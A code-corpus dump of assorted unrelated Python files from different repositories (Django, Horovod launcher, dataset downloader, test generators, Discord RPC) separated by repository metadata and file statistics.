emails = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('email').get('type_uri', ''), '')
display_names = ax_data.get(django_openidconsumer.config.URI_GROUPS.get('alias').get('type_uri', ''), '')
if emails and not user.email.strip():
user.email = emails[0]
user.save()
if not user.profile.display_name.strip() or is_random(user.profile.display_name):
if display_names:
user.profile.display_name = display_names[0]
elif emails:
user.profile.display_name = emails[0].split('@')[0]
user.profile.save() | 32.262626 | 109 | 0.681277 | 825 | 6,388 | 5.100606 | 0.207273 | 0.034221 | 0.02424 | 0.019962 | 0.201046 | 0.144487 | 0.077947 | 0.04135 | 0.022338 | 0 | 0 | 0.003627 | 0.223075 | 6,388 | 198 | 110 | 32.262626 | 0.844247 | 0.170319 | 0 | 0.184874 | 0 | 0 | 0.026904 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.117647 | false | 0.05042 | 0.159664 | 0 | 0.378151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
f20f3b3cdb095ea301a3efa6ea5c8c922e9be8db | 640 | py | Python | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 44 | 2016-09-07T11:04:10.000Z | 2022-03-14T07:38:17.000Z | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 1 | 2016-09-06T23:33:54.000Z | 2016-09-06T23:33:54.000Z | ghiaseddin/scripts/download-dataset-lfw10.py | yassersouri/ghiaseddin | a575f2375729e7586ae7c682f8505dbb7619e622 | [
"MIT"
] | 13 | 2016-09-17T15:31:06.000Z | 2021-05-22T07:28:46.000Z | from subprocess import call
import os
import sys
sys.path.append(os.path.join(os.path.dirname(os.path.realpath(__file__)), os.pardir))
import settings
data_zip_path = os.path.join(settings.lfw10_root, "LFW10.zip")
data_url = "http://cvit.iiit.ac.in/images/Projects/relativeParts/LFW10.zip"
# Downloading the data zip and extracting it
call(["wget",
"--continue", # do not download things again
"--tries=0", # try many times to finish the download
"--output-document=%s" % data_zip_path, # save it to the appropriate place
data_url])
call(["unzip -d %s %s" % (settings.lfw10_root, data_zip_path)], shell=True)
| 33.684211 | 85 | 0.714063 | 99 | 640 | 4.474747 | 0.565657 | 0.054176 | 0.074492 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016484 | 0.146875 | 640 | 18 | 86 | 35.555556 | 0.794872 | 0.221875 | 0 | 0 | 0 | 0 | 0.259635 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.307692 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
f210443ae14873f6d0154e4872180eb345a39221 | 9,874 | py | Python | hops/dist_allreduce.py | Limmen/hops-util-py | 99263edcd052dbb554f0cde944fbdc748dc95f06 | [
"Apache-2.0"
] | null | null | null | hops/dist_allreduce.py | Limmen/hops-util-py | 99263edcd052dbb554f0cde944fbdc748dc95f06 | [
"Apache-2.0"
] | null | null | null | hops/dist_allreduce.py | Limmen/hops-util-py | 99263edcd052dbb554f0cde944fbdc748dc95f06 | [
"Apache-2.0"
] | null | null | null | """
Utility functions to retrieve information about available services and setting up security for the Hops platform.
These utils facilitates development by hiding complexity for programs interacting with Hops services.
"""
import pydoop.hdfs
import subprocess
import os
import stat
import sys
import threading
import time
import socket
from hops import hdfs as hopshdfs
from hops import tensorboard
from hops import devices
from hops import util
import coordination_server
run_id = 0
def launch(spark_session, notebook):
""" Run notebook pointed to in HopsFS as a python file in mpirun
Args:
:spark_session: SparkSession object
:notebook: The path in HopsFS to the notebook
"""
global run_id
print('\nStarting TensorFlow job, follow your progress on TensorBoard in Jupyter UI! \n')
sys.stdout.flush()
sc = spark_session.sparkContext
app_id = str(sc.applicationId)
conf_num = int(sc._conf.get("spark.executor.instances"))
#Each TF task should be run on 1 executor
nodeRDD = sc.parallelize(range(conf_num), conf_num)
server = coordination_server.Server(conf_num)
server_addr = server.start()
#Force execution on executor, since GPU is located on executor
nodeRDD.foreachPartition(prepare_func(app_id, run_id, notebook, server_addr))
print('Finished TensorFlow job \n')
print('Make sure to check /Logs/TensorFlow/' + app_id + '/runId.' + str(run_id) + ' for logfile and TensorBoard logdir')
def get_logdir(app_id):
global run_id
return hopshdfs.project_path() + '/Logs/TensorFlow/' + app_id + '/horovod/run.' + str(run_id)
def prepare_func(app_id, run_id, nb_path, server_addr):
def _wrapper_fun(iter):
for i in iter:
executor_num = i
client = coordination_server.Client(server_addr)
node_meta = {'host': get_ip_address(),
'executor_cwd': os.getcwd(),
'cuda_visible_devices_ordinals': devices.get_minor_gpu_device_numbers()}
client.register(node_meta)
t_gpus = threading.Thread(target=devices.print_periodic_gpu_utilization)
if devices.get_num_gpus() > 0:
t_gpus.start()
# Only spark executor with index 0 should create necessary HDFS directories and start mpirun
# Other executors simply block until index 0 reports mpirun is finished
clusterspec = client.await_reservations()
#pydoop.hdfs.dump('', os.environ['EXEC_LOGFILE'], user=hopshdfs.project_user())
#hopshdfs.init_logger()
#hopshdfs.log('Starting Spark executor with arguments')
gpu_str = '\n\nChecking for GPUs in the environment\n' + devices.get_gpu_info()
#hopshdfs.log(gpu_str)
print(gpu_str)
mpi_logfile_path = os.getcwd() + '/mpirun.log'
if os.path.exists(mpi_logfile_path):
os.remove(mpi_logfile_path)
mpi_logfile = open(mpi_logfile_path, 'w')
py_runnable = localize_scripts(nb_path, clusterspec)
# non-chief executor should not do mpirun
if not executor_num == 0:
client.await_mpirun_finished()
else:
hdfs_exec_logdir, hdfs_appid_logdir = hopshdfs.create_directories(app_id, run_id, param_string='Horovod')
tb_hdfs_path, tb_pid = tensorboard.register(hdfs_exec_logdir, hdfs_appid_logdir, 0)
mpi_cmd = 'HOROVOD_TIMELINE=' + tensorboard.logdir() + '/timeline.json' + \
' TENSORBOARD_LOGDIR=' + tensorboard.logdir() + \
' mpirun -np ' + str(get_num_ps(clusterspec)) + ' --hostfile ' + get_hosts_file(clusterspec) + \
' -bind-to none -map-by slot ' + \
' -x LD_LIBRARY_PATH ' + \
' -x HOROVOD_TIMELINE ' + \
' -x TENSORBOARD_LOGDIR ' + \
' -x NCCL_DEBUG=INFO ' + \
' -mca pml ob1 -mca btl ^openib ' + \
os.environ['PYSPARK_PYTHON'] + ' ' + py_runnable
mpi = subprocess.Popen(mpi_cmd,
shell=True,
stdout=mpi_logfile,
stderr=mpi_logfile,
preexec_fn=util.on_executor_exit('SIGTERM'))
t_log = threading.Thread(target=print_log)
t_log.start()
mpi.wait()
client.register_mpirun_finished()
if devices.get_num_gpus() > 0:
t_gpus.do_run = False
t_gpus.join()
return_code = mpi.returncode
if return_code != 0:
cleanup(tb_hdfs_path)
t_log.do_run = False
t_log.join()
raise Exception('mpirun FAILED, look in the logs for the error')
cleanup(tb_hdfs_path)
t_log.do_run = False
t_log.join()
return _wrapper_fun
def print_log():
mpi_logfile_path = os.getcwd() + '/mpirun.log'
mpi_logfile = open(mpi_logfile_path, 'r')
t = threading.currentThread()
while getattr(t, "do_run", True):
where = mpi_logfile.tell()
line = mpi_logfile.readline()
if not line:
time.sleep(1)
mpi_logfile.seek(where)
else:
print line
# Get the last outputs
line = mpi_logfile.readline()
while line:
where = mpi_logfile.tell()
print line
line = mpi_logfile.readline()
mpi_logfile.seek(where)
def cleanup(tb_hdfs_path):
hopshdfs.log('Performing cleanup')
handle = hopshdfs.get()
if not tb_hdfs_path == None and not tb_hdfs_path == '' and handle.exists(tb_hdfs_path):
handle.delete(tb_hdfs_path)
hopshdfs.kill_logger()
def get_ip_address():
"""Simple utility to get host IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def get_hosts_string(clusterspec):
hosts_string = ''
for host in clusterspec:
hosts_string = hosts_string + ' ' + host['host'] + ':' + str(len(host['cuda_visible_devices_ordinals']))
def get_num_ps(clusterspec):
num = 0
for host in clusterspec:
num += len(host['cuda_visible_devices_ordinals'])
return num
def get_hosts_file(clusterspec):
hf = ''
host_file = os.getcwd() + '/host_file'
for host in clusterspec:
hf = hf + '\n' + host['host'] + ' ' + 'slots=' + str(len(host['cuda_visible_devices_ordinals']))
with open(host_file, 'w') as hostfile: hostfile.write(hf)
return host_file
def find_host_in_clusterspec(clusterspec, host):
for h in clusterspec:
if h['name'] == host:
return h
# The code generated by this function will be called in an eval, which changes the working_dir and cuda_visible_devices for process running mpirun
def generate_environment_script(clusterspec):
import_script = 'import os \n' \
'from hops import util'
export_script = ''
for host in clusterspec:
export_script += 'def export_workdir():\n' \
' if util.get_ip_address() == \"' + find_host_in_clusterspec(clusterspec, host['host'])['host'] + '\":\n' \
' os.chdir=\"' + host['executor_cwd'] + '\"\n' \
' os.environ["CUDA_DEVICE_ORDER"]=\"PCI_BUS_ID\" \n' \
' os.environ["CUDA_VISIBLE_DEVICES"]=\"' + ",".join(str(x) for x in host['cuda_visible_devices_ordinals']) + '\"\n'
return import_script + '\n' + export_script
def localize_scripts(nb_path, clusterspec):
# 1. Download the notebook as a string
fs_handle = hopshdfs.get_fs()
fd = fs_handle.open_file(nb_path, flags='r')
note = fd.read()
fd.close()
path, filename = os.path.split(nb_path)
f_nb = open(filename,"w+")
f_nb.write(note)
f_nb.flush()
f_nb.close()
# 2. Convert notebook to py file
jupyter_runnable = os.path.abspath(os.path.join(os.environ['PYSPARK_PYTHON'], os.pardir)) + '/jupyter'
conversion_cmd = jupyter_runnable + ' nbconvert --to python ' + filename
conversion = subprocess.Popen(conversion_cmd,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
conversion.wait()
stdout, stderr = conversion.communicate()
print(stdout)
print(stderr)
# 3. Prepend script to export environment variables and Make py file runnable
py_runnable = os.getcwd() + '/' + filename.split('.')[0] + '.py'
notebook = 'with open("generate_env.py", "r") as myfile:\n' \
' data=myfile.read()\n' \
' exec(data)\n'
with open(py_runnable, 'r') as original: data = original.read()
with open(py_runnable, 'w') as modified: modified.write(notebook + data)
st = os.stat(py_runnable)
os.chmod(py_runnable, st.st_mode | stat.S_IEXEC)
# 4. Localize generate_env.py script
environment_script = generate_environment_script(clusterspec)
generate_env_path = os.getcwd() + '/generate_env.py'
f_env = open(generate_env_path, "w+")
f_env.write(environment_script)
f_env.flush()
f_env.close()
# 5. Make generate_env.py runnable
st = os.stat(generate_env_path)
os.chmod(py_runnable, st.st_mode | stat.S_IEXEC)
return py_runnable | 36.435424 | 295 | 0.594896 | 1,190 | 9,874 | 4.714286 | 0.267227 | 0.030303 | 0.01426 | 0.023173 | 0.12246 | 0.105704 | 0.05918 | 0.035294 | 0.026381 | 0.026381 | 0 | 0.003633 | 0.303119 | 9,874 | 271 | 296 | 36.435424 | 0.811655 | 0.086591 | 0 | 0.169399 | 0 | 0 | 0.143424 | 0.034571 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.087432 | null | null | 0.060109 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f218482525c6f07411100d66a18c105ea0a2d6c8 | 926 | py | Python | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | samples/noxfile_config.py | ikuleshov/python-analytics-admin | f3d6fa78292878e7470806be0c116c6ca589eec5 | [
"Apache-2.0"
] | null | null | null | TEST_CONFIG_OVERRIDE = {
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
"gcloud_project_env": "BUILD_SPECIFIC_GCLOUD_PROJECT",
# 'gcloud_project_env': 'BUILD_SPECIFIC_GCLOUD_PROJECT',
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {
"GA_TEST_PROPERTY_ID": "276206997",
"GA_TEST_ACCOUNT_ID": "199820965",
"GA_TEST_USER_LINK_ID": "103401743041912607932",
"GA_TEST_PROPERTY_USER_LINK_ID": "105231969274497648555",
"GA_TEST_ANDROID_APP_DATA_STREAM_ID": "2828100949",
"GA_TEST_IOS_APP_DATA_STREAM_ID": "2828089289",
"GA_TEST_WEB_DATA_STREAM_ID": "2828068992",
},
}
| 46.3 | 70 | 0.712743 | 127 | 926 | 4.826772 | 0.503937 | 0.068516 | 0.092985 | 0.127243 | 0.14845 | 0.14845 | 0.14845 | 0.14845 | 0 | 0 | 0 | 0.121786 | 0.201944 | 926 | 19 | 71 | 48.736842 | 0.707713 | 0.429806 | 0 | 0 | 0 | 0 | 0.609615 | 0.365385 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
f21a51bd13a2f891e2303ec8e105009193f93ecb | 422 | py | Python | saleor/unurshop/crawler/migrations/0013_auto_20210921_0452.py | nlkhagva/saleor | 0d75807d08ac49afcc904733724ac870e8359c10 | [
"CC-BY-4.0"
] | null | null | null | saleor/unurshop/crawler/migrations/0013_auto_20210921_0452.py | nlkhagva/saleor | 0d75807d08ac49afcc904733724ac870e8359c10 | [
"CC-BY-4.0"
] | 1 | 2022-02-15T03:31:12.000Z | 2022-02-15T03:31:12.000Z | saleor/unurshop/crawler/migrations/0013_auto_20210921_0452.py | nlkhagva/ushop | abf637eb6f7224e2d65d62d72a0c15139c64bb39 | [
"CC-BY-4.0"
] | null | null | null | # Generated by Django 3.1.1 on 2021-09-21 04:52
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('crawler', '0012_auto_20210921_0451'),
]
operations = [
migrations.AlterField(
model_name='crawlerline',
name='ustatus',
field=models.PositiveIntegerField(blank=True, default=1, null=True),
),
]
| 22.210526 | 80 | 0.618483 | 45 | 422 | 5.711111 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10356 | 0.267773 | 422 | 18 | 81 | 23.444444 | 0.728155 | 0.106635 | 0 | 0 | 1 | 0 | 0.128 | 0.061333 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1eec0296b555ebcc98cbc7b360b616946e53db82 | 941 | py | Python | manabi/apps/flashcards/permissions.py | aehlke/manabi | 1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b | [
"MIT"
] | 14 | 2015-10-03T07:34:28.000Z | 2021-09-20T07:10:29.000Z | manabi/apps/flashcards/permissions.py | aehlke/manabi | 1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b | [
"MIT"
] | 23 | 2019-10-25T08:47:23.000Z | 2022-01-30T02:00:45.000Z | manabi/apps/flashcards/permissions.py | aehlke/manabi | 1dfdd4ecb9c1214b6a70268be0dcfeda9da8754b | [
"MIT"
] | 7 | 2016-10-04T08:10:36.000Z | 2021-09-20T07:10:33.000Z | from django.shortcuts import get_object_or_404
from rest_framework import permissions
from manabi.apps.flashcards.models import Deck
WRITE_ACTIONS = ['create', 'update', 'partial_update', 'delete']
class DeckSynchronizationPermission(permissions.BasePermission):
message = "You don't have permission to add this deck to your library."
def has_permission(self, request, view):
if view.action in WRITE_ACTIONS:
upstream_deck = get_object_or_404(
Deck, pk=request.data['synchronized_with'])
return upstream_deck.shared
return True
class IsOwnerPermission(permissions.BasePermission):
message = "You don't own this."
def has_object_permission(self, request, view, obj):
if view.action in WRITE_ACTIONS:
return (
request.user.is_authenticated and
obj.owner.pk == request.user.pk
)
return True
| 30.354839 | 75 | 0.679065 | 112 | 941 | 5.544643 | 0.535714 | 0.057971 | 0.035427 | 0.045089 | 0.20934 | 0.20934 | 0 | 0 | 0 | 0 | 0 | 0.008439 | 0.244421 | 941 | 30 | 76 | 31.366667 | 0.864979 | 0 | 0 | 0.190476 | 0 | 0 | 0.134963 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.095238 | false | 0 | 0.142857 | 0 | 0.619048 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1eef8337b3089adedce496c555766805e7a14c76 | 365 | py | Python | Scripts/create_phone_number.py | yogeshwaran01/Mini-Projects | c1a8790079d904405d49c71d6903ca4daaa77b38 | [
"MIT"
] | 4 | 2020-09-30T17:18:13.000Z | 2021-06-11T21:02:10.000Z | Scripts/create_phone_number.py | yogeshwaran01/Mini-Projects | c1a8790079d904405d49c71d6903ca4daaa77b38 | [
"MIT"
] | null | null | null | Scripts/create_phone_number.py | yogeshwaran01/Mini-Projects | c1a8790079d904405d49c71d6903ca4daaa77b38 | [
"MIT"
] | 1 | 2021-04-02T14:51:00.000Z | 2021-04-02T14:51:00.000Z | """
Function convert lists of 10 elements
into in the format of phone number
Example,
(123) 456-789
"""
def create_phone_number(n: list) -> str:
"""
>>> create_phone_number([1,2,3,4,5,6,7,8,9,0])
'(123) 456-7890'
"""
return "({}{}{}) {}{}{}-{}{}{}{}".format(*n)
if __name__ == "__main__":
import doctest
doctest.testmod()
| 15.869565 | 50 | 0.556164 | 50 | 365 | 3.82 | 0.78 | 0.172775 | 0.17801 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.109541 | 0.224658 | 365 | 22 | 51 | 16.590909 | 0.565371 | 0.449315 | 0 | 0 | 0 | 0 | 0.189349 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
1ef2ba31fbb403bcb4ce6125ac2b8a6fd53306d0 | 527 | py | Python | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 5 | 2019-11-11T10:01:52.000Z | 2020-12-08T11:56:33.000Z | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-06-13T06:39:44.000Z | 2020-06-13T06:39:44.000Z | src/tests/flow.py | SeleSchaefer/super_resolution | bf28a959fb150ceeadbd9f0bcfc12f3025cf82f4 | [
"MIT"
] | 1 | 2020-07-16T23:07:28.000Z | 2020-07-16T23:07:28.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import cv2
import imageio
import numpy as np
from tar.miscellaneous import convert_flow_to_color
prev = imageio.imread("ressources/1_1.png")
prev = cv2.cvtColor(prev, cv2.COLOR_RGB2GRAY)
curr = imageio.imread("ressources/1_2.png")
curr = cv2.cvtColor(curr, cv2.COLOR_RGB2GRAY)
flow = cv2.calcOpticalFlowFarneback(prev, curr, None, 0.9, 15, 20, 100, 10, 1.5, cv2.OPTFLOW_FARNEBACK_GAUSSIAN)
rgb = convert_flow_to_color(flow)
imageio.imsave("/Users/sele/Desktop/test.png", rgb)
| 29.277778 | 112 | 0.759013 | 83 | 527 | 4.674699 | 0.566265 | 0.056701 | 0.06701 | 0.092784 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059197 | 0.102467 | 527 | 17 | 113 | 31 | 0.761099 | 0.081594 | 0 | 0 | 0 | 0 | 0.13278 | 0.058091 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.363636 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1ef4bd40a0edef859ca09644504d0ac02de309a6 | 746 | py | Python | post/migrations/0009_auto_20171207_2320.py | silvareal/personal-blog | 9ed8ac48864510cd5b3227b7b0f7d335beb648de | [
"MIT"
] | 2 | 2018-03-15T16:53:11.000Z | 2020-01-17T15:56:33.000Z | post/migrations/0009_auto_20171207_2320.py | silvareal/personal-blog | 9ed8ac48864510cd5b3227b7b0f7d335beb648de | [
"MIT"
] | null | null | null | post/migrations/0009_auto_20171207_2320.py | silvareal/personal-blog | 9ed8ac48864510cd5b3227b7b0f7d335beb648de | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-12-07 22:20
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('post', '0008_auto_20171207_2256'),
]
operations = [
migrations.RemoveField(
model_name='post',
name='category',
),
migrations.AddField(
model_name='post',
name='category',
field=models.CharField(choices=[('frontend', 'Frontend'), ('backend', 'Backend'), ('interview', 'Interview'), ('devop', 'Devop')], default='backend', max_length=15),
),
migrations.DeleteModel(
name='Category',
),
]
| 26.642857 | 177 | 0.577748 | 71 | 746 | 5.915493 | 0.676056 | 0.085714 | 0.061905 | 0.080952 | 0.119048 | 0 | 0 | 0 | 0 | 0 | 0 | 0.062731 | 0.273458 | 746 | 27 | 178 | 27.62963 | 0.712177 | 0.088472 | 0 | 0.35 | 1 | 0 | 0.183161 | 0.033973 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1ef930c42df2781ea2ef6709774093b794cfc83e | 3,081 | py | Python | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | testing/tests/registers.py | Wynjones1/gbvhdl | 46cef04cef308967ea4764eeeaf7d611dc783ae4 | [
"MIT"
] | null | null | null | #!/usr/bin/env python2.7
from common import *
from random import randint, choice
registers = {\
"a" : int("0000", 2),
"f" : int("0001", 2),
"b" : int("0010", 2),
"c" : int("0011", 2),
"d" : int("0100", 2),
"e" : int("0101", 2),
"h" : int("0110", 2),
"l" : int("0111", 2),
"af" : int("1000", 2),
"bc" : int("1001", 2),
"de" : int("1010", 2),
"hl" : int("1011", 2),
"sp" : int("1100", 2),
"pc" : int("1101", 2),
}
def output_line(fp, reg_write, reg_read, we,
write_data, read_data, reg_w_name, reg_r_name):
fp.write("%s %s %s %s %s #%s %s\n" %
(to_bin(reg_write, 4),
to_bin(reg_read, 4),
"1" if we else "0",
to_bin(write_data, 16),
to_bin(read_data, 16),
reg_w_name,
reg_r_name))
class Registers(object):
def __init__(self):
self.regs = [0] * 8
self.sp = 0
self.pc = 0
def write(self, reg, value):
if reg == "af":
self.regs[registers["a"]] = (value >> 8) & 0xff
self.regs[registers["f"]] = (value >> 0) & 0xff
elif reg == "bc":
self.regs[registers["b"]] = (value >> 8) & 0xff
self.regs[registers["c"]] = (value >> 0) & 0xff
elif reg == "de":
self.regs[registers["d"]] = (value >> 8) & 0xff
self.regs[registers["e"]] = (value >> 0) & 0xff
elif reg == "hl":
self.regs[registers["h"]] = (value >> 8) & 0xff
self.regs[registers["l"]] = (value >> 0) & 0xff
elif reg == "sp":
self.sp = value
elif reg == "pc":
self.pc = value
else:
self.regs[registers[reg]] = (value) & 0xff
def read(self, reg):
if reg == "af":
return self.regs[registers["a"]] << 8 | self.regs[registers["f"]];
elif reg == "bc":
return self.regs[registers["b"]] << 8 | self.regs[registers["c"]];
elif reg == "de":
return self.regs[registers["d"]] << 8 | self.regs[registers["e"]];
elif reg == "hl":
return self.regs[registers["h"]] << 8 | self.regs[registers["l"]];
elif reg == "sp":
return self.sp
elif reg == "pc":
return self.pc
else:
return self.regs[registers[reg]];
def random_op(self):
we = randint(0, 1)
reg_write = choice(registers.keys())
reg_read = choice(registers.keys())
write_data = randint(0, 0xffff)
read_data = self.read(reg_read)
if we:
self.write(reg_write, write_data)
return (registers[reg_write], registers[reg_read],
we, write_data, read_data, reg_write, reg_read)
def main():
fp = open("registers.txt", "w")
reg = Registers()
m = 1000000
for i in xrange(m):
if i % 10000 == 0:
f = 100 * float(i) / float(m)
print("%s" % f)
output_line(fp, *reg.random_op())
if __name__ == "__main__":
main()
| 31.121212 | 79 | 0.477118 | 404 | 3,081 | 3.517327 | 0.220297 | 0.106967 | 0.215341 | 0.080929 | 0.190007 | 0.142153 | 0.040816 | 0.040816 | 0 | 0 | 0 | 0.061455 | 0.339825 | 3,081 | 98 | 80 | 31.438776 | 0.637168 | 0.007465 | 0 | 0.159091 | 0 | 0 | 0.053974 | 0 | 0 | 0 | 0.013739 | 0 | 0 | 1 | 0.068182 | false | 0 | 0.022727 | 0 | 0.193182 | 0.011364 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
1efa2e6d895702b8d443cbba288ae926b3327dee | 290 | py | Python | DiscordRPC/__init__.py | EterNomm/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | 4 | 2021-12-13T13:26:00.000Z | 2022-02-20T17:11:19.000Z | DiscordRPC/__init__.py | LyQuid12/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | null | null | null | DiscordRPC/__init__.py | LyQuid12/discord-rpc | 86bdf35a75df9ab8971763042d19f2f820e08a51 | [
"Apache-2.0"
] | null | null | null | from .presence import *
from .button import button
from .exceptions import *
#from .get_current_app import GCAR (Disabling due to a bug)
__title__ = "Discord-RPC"
__version__ = "3.5"
__authors__ = "LyQuid"
__license__ = "Apache License 2.0"
__copyright__ = "Copyright 2021-present LyQuid"
| 26.363636 | 59 | 0.762069 | 39 | 290 | 5.102564 | 0.74359 | 0.100503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.032129 | 0.141379 | 290 | 10 | 60 | 29 | 0.767068 | 0.2 | 0 | 0 | 0 | 0 | 0.290043 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.375 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
1efbf1d335ee13e467149f16bec6b633d71434fe | 1,314 | py | Python | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | src/graph/cli/server.py | clayman-micro/graph | 742015c276f89841310794e952280a06c24fe8ef | [
"MIT"
] | null | null | null | import socket
import click
import uvicorn # type: ignore
def get_address(default: str = "127.0.0.1") -> str:
try:
ip_address = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(("8.8.8.8", 1))
ip_address = s.getsockname()[0]
except socket.gaierror:
ip_address = default
finally:
s.close()
